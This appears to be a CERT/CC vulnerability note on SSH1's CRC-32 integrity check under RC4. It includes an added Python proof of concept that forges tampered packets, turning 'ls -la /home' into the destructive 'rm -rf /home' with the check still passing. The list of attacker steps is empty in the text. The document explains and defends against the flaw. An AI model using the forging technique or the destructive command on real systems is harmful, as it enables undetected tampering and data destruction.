There is an information integrity vulnerability in the SSH1 protocol that allows RC4-encrypted packets to be modified in transit without detection.
The attack applies only when both of the following conditions hold: the client has requested RC4 and the server supports it, and compression is disabled (with compression enabled, a change to the ciphertext no longer maps to a predictable change in the decompressed plaintext).
When using the RC4 stream cipher, SSH1 relies on a cyclic redundancy check (CRC-32) to verify the integrity of incoming packets. The CRC is computed over the plaintext and encrypted together with it, but this offers no protection: RC4 encrypts by XORing a keystream into the data, and CRC-32 is affine with respect to XOR, so XORing a chosen mask into the ciphertext XORs the same mask into the plaintext, and the correction needed in the encrypted CRC field depends only on the mask, not on the plaintext or the key. An attacker can therefore intercept an SSH packet, modify its contents, adjust the CRC to match, and forward the packet to the victim, where the CRC integrity check will pass. The attacker can make arbitrary modifications to the packet and the victim is unable to detect them. This vulnerability results from the fact that a CRC is an error-detecting code, not a cryptographic integrity check: it contains no secret and no measure to prevent deliberate tampering with the checksum.
To exploit this vulnerability, an attacker must:
Because the CRC has been modified to account for the "addition" (XOR) of the chosen mask M, the CRC integrity check on the victim's SSH client will pass.
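The following is an added demonstration of the mechanism described above; it is not code from CERT/CC or from any SSH implementation. It models a single SSH1-style packet (payload followed by its CRC-32, XORed with an RC4 keystream), then shows an attacker with no key and no plaintext XORing a mask M into the ciphertext and correcting the encrypted CRC field using the affine property crc(P ^ M) = crc(P) ^ crc(M) ^ crc(zeros). All keys and payloads are constructed for the example; zlib's CRC-32 stands in for SSH1's own CRC variant (the XOR-affine property holds for both), the RC4 routine is a textbook one written for the demo, and the keyed-MAC contrast is a simplified encrypt-then-MAC construction, not SSH2's exact scheme.

```python
import hashlib
import hmac
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4 (KSA + PRGA), written for this demo only."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    assert len(a) == len(b)
    return bytes(x ^ y for x, y in zip(a, b))


def crc32(data: bytes) -> int:
    # zlib's CRC-32 stands in for SSH1's variant; both are affine over XOR.
    return zlib.crc32(data) & 0xFFFFFFFF


def encrypt_crc(key: bytes, payload: bytes) -> bytes:
    """Sender: CRC over the plaintext, then RC4 over payload and CRC together."""
    plain = payload + struct.pack(">I", crc32(payload))
    return xor_bytes(plain, rc4_keystream(key, len(plain)))


def decrypt_crc(key: bytes, packet: bytes):
    """Receiver: decrypt, split off the CRC, return (payload, crc_ok)."""
    plain = xor_bytes(packet, rc4_keystream(key, len(packet)))
    payload, crc_field = plain[:-4], struct.unpack(">I", plain[-4:])[0]
    return payload, crc_field == crc32(payload)


def tamper_crc(packet: bytes, mask: bytes) -> bytes:
    """Attacker: no key, no plaintext. XOR mask M into the ciphertext body (RC4 is a
    stream cipher, so the plaintext becomes P ^ M) and XOR the matching correction
    into the encrypted CRC field. The correction depends only on M, because
        crc(P ^ M) == crc(P) ^ crc(M) ^ crc(zeros of len(M))."""
    body_len = len(packet) - 4
    assert len(mask) == body_len
    delta = crc32(mask) ^ crc32(bytes(body_len))
    tampered_body = xor_bytes(packet[:-4], mask)
    old_crc_field = struct.unpack(">I", packet[-4:])[0]
    return tampered_body + struct.pack(">I", old_crc_field ^ delta)


def encrypt_mac(enc_key: bytes, mac_key: bytes, payload: bytes) -> bytes:
    """Contrast: a keyed MAC (HMAC-SHA1, encrypt-then-MAC) instead of a CRC."""
    ct = xor_bytes(payload, rc4_keystream(enc_key, len(payload)))
    return ct + hmac.new(mac_key, ct, hashlib.sha1).digest()


def decrypt_mac(enc_key: bytes, mac_key: bytes, packet: bytes):
    ct, tag = packet[:-20], packet[-20:]
    ok = hmac.compare_digest(tag, hmac.new(mac_key, ct, hashlib.sha1).digest())
    return xor_bytes(ct, rc4_keystream(enc_key, len(ct))), ok


def demo():
    """Constructed inputs: session key, original command, and the same-length command
    the attacker wants delivered instead. The attacker is assumed to know the original
    plaintext here; for blind bit flips any mask M works just as well."""
    key = b"constructed-session-key"
    original = b"ls -la /home"
    target = b"rm -rf /home"
    mask = xor_bytes(original, target)

    packet = encrypt_crc(key, original)
    forged_payload, crc_ok = decrypt_crc(key, tamper_crc(packet, mask))

    mac_key = b"constructed-mac-key"
    mac_packet = encrypt_mac(key, mac_key, original)
    forged = xor_bytes(mac_packet[:-20], mask) + mac_packet[-20:]
    _, mac_ok = decrypt_mac(key, mac_key, forged)
    return forged_payload, crc_ok, mac_ok


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows the CRC-protected packet decrypting to the attacker's command with the integrity check still passing, while the same bit flips against the HMAC-protected packet are rejected; the difference is that the MAC is keyed and not linear over XOR, so no correction can be computed without the MAC key.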
Attackers can modify or logically delete arbitrary SSH packets.
SSH Communications Security recommends disabling RC4 in SSH1 or upgrading to SSH2, which protects packets with a keyed message authentication code rather than a CRC.
Vendor                      | Status | Date Notified | Date Updated
SSH Communications Security |        | -             | 06 Feb 2001
OpenSSH                     |        | -             | 29 Oct 2001
Group         | Score | Vector
Base          | N/A   | N/A
Temporal      | N/A   | N/A
Environmental | N/A   | N/A
The CERT/CC thanks Antti Huima, Tuomas Aura, and Janne Salmi for their analysis and Tatu Ylonen for bringing this vulnerability to our attention.
This document was written by Jeffrey P. Lanza.